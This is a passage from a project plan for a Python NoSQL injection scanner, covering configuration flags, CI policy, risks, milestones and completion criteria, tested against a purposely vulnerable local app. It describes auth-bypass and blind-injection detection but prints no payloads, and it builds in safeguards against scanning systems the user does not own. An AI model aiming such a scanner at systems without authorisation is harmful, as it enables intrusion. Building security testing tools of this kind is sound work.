  • Response body cap: Read at most 1MB of response body per request (prevents memory issues on large responses)
  • Graceful degradation: If a form fails baseline capture (e.g., requires auth), skip it with a warning instead of aborting the entire scan

8. Configuration Surface

8.1 Non-Secret Settings

Key Type Default Description
--url string (required) Target base URL
--max-depth int 2 Maximum crawl depth
--timeout float 5.0 Per-request timeout (seconds)
--delay float 0.1 Inter-request delay (seconds)
--output string report.json Output report file path
--verbose bool false Enable detailed request/response logging
--content-type enum both Content types to test: both, urlencoded, json
--endpoints list[str] [] Manual endpoint specifications (skip crawling)
--categories list[str] all Payload categories to use

8.2 Secret / Credential Storage

No secrets are required by the scanner itself. If the target requires authentication before scanning protected endpoints, the user should:

  1. Use --endpoints mode with manually specified endpoints
  2. Or pre-authenticate via browser and export cookies to a file (future V2 feature)

No credential storage mechanism is needed for V1.


9. CI/CD and Governance Plan

Pull Requests / Merges

  1. All code changes via pull request to main
  2. PR checks:
    • Python syntax validation (python -m py_compile on all .py files)
    • pip install -r requirements.txt succeeds
    • Basic smoke test: python scanner.py --help exits 0

Release Candidates

  1. Full integration test against the vulnerable target app
  2. Dependency audit (pip audit)
  3. Clean install test from fresh venv
  4. Report output validation against schema

Branch and Review Policy

  • main branch is protected
  • Feature branches named feature/<description>
  • At least one reviewer approval required before merge
  • Squash merges preferred for clean history

10. Risks and Mitigations

Risk 1 (Technical) — The target app's forms use JavaScript-based submission (fetch API), so standard HTML form parsing may miss the actual API endpoints. Mitigation — Implement --endpoints manual override mode; additionally, add JS file scanning to extract fetch/XHR URLs as a best-effort enhancement.

Risk 2 (Security) — A user accidentally runs the scanner against a production system they don't own, causing legal liability. Mitigation — Print mandatory legal disclaimer on startup; require --confirm-external flag for non-localhost targets.

Risk 3 (Operational) — The target app's session management (cookie-based) may cause false positives if a bypass payload sets a session that affects subsequent requests. Mitigation — Reset session (clear cookies) between payload groups; establish fresh baseline before each form's injection round.

Risk 4 (UX/Adoption) — False positives erode user trust and make the tool unreliable for real assessments. Mitigation — Multi-factor heuristic scoring (require both status code change AND body content indicator for "confirmed" confidence); clear confidence labels (confirmed/tentative/speculative) in reports.

Risk 5 (Technical) — Time-based blind detection is inherently noisy — network latency can cause false positives/negatives. Mitigation — Use conservative threshold (payload delay × 0.8); run time-based payloads last; recommend local-network testing for reliable timing results.


11. Milestone Timeline

Week Phases Description
Week 1 Phase 0 + Phase 1 Environment setup, models, payloads, utilities
Week 2 Phase 2 + Phase 3 URL validation, crawler, form parser
Week 3 Phase 4 Injection engine with dual content-type support
Week 4 Phase 5 + Phase 6 Response analyzer, severity scoring, report generation
Week 5 Phase 7 CLI entry point, pipeline integration
Week 6 Phase 8 + Phase 9 Testing, validation, documentation, release

12. Definition of Done (Project)

  • python scanner.py --url http://localhost:3000 --output report.json completes without errors
  • JSON report correctly identifies auth bypass on /api/vuln/login as critical
  • JSON report correctly identifies search injection on /api/vuln/search as high
  • Scanner produces zero false positives against /api/secure/login and /api/secure/search
  • payloads.json contains 20+ categorized payloads derived from wordlist and reference materials
  • Console output is color-coded with rich formatting and includes progress indicators
  • --verbose mode logs every request/response pair
  • --endpoints manual mode works for targeted scanning without crawling
  • All errors (timeout, connection, malformed HTML) are handled gracefully
  • README.md contains complete usage documentation with examples
  • requirements.txt contains pinned dependencies that install cleanly
  • Report output matches the JSON contract defined in the README

13. Reference Index

ID Title Location
R1 Project README — CLI Scanner README.md
R2 NoSQL Injection Reference Guide NoSQL Injection.md
R3 NoSQL Injection Wordlist nosqli_worlist.txt
R4 Vulnerable Target — Server Config server.js
R5 Mode Auth Flow Test Results MODE_AUTH_FLOW_TEST_RESULTS.md
R6 Project Tasks Checklist TASKS.md
R7 NoSQL Testing Guide NOSQLI_TESTING_GUIDE.md
R8 Vulnerable Auth Controller vulnAuth.js
R9 Vulnerable Search Controller vulnSearch.js
R10 Vulnerable Routes vulnRoutes.js

14. Immediate Next Execution Steps

  1. Create the cli/core/ package: mkdir cli/core && touch cli/core/__init__.py — establish the module structure.
  2. Write core/models.py: Define all dataclasses (FormTarget, Payload, Finding, ScanResult, BaselineResponse, InjectionResult). This is the zero-dependency starting point that all other modules import.
  3. Populate payloads.json: Curate the full payload catalog from the wordlist and reference guide. Validate it loads correctly with json.load().
  4. Write core/utils.py: Implement logging setup, URL helpers, and all constant lists (error signatures, success/failure indicators). Import and test from a REPL.
  5. Write requirements.txt: Add requests>=2.32, beautifulsoup4>=4.12, rich>=13.0, urllib3>=2.0 and run pip install -r requirements.txt to confirm clean installation.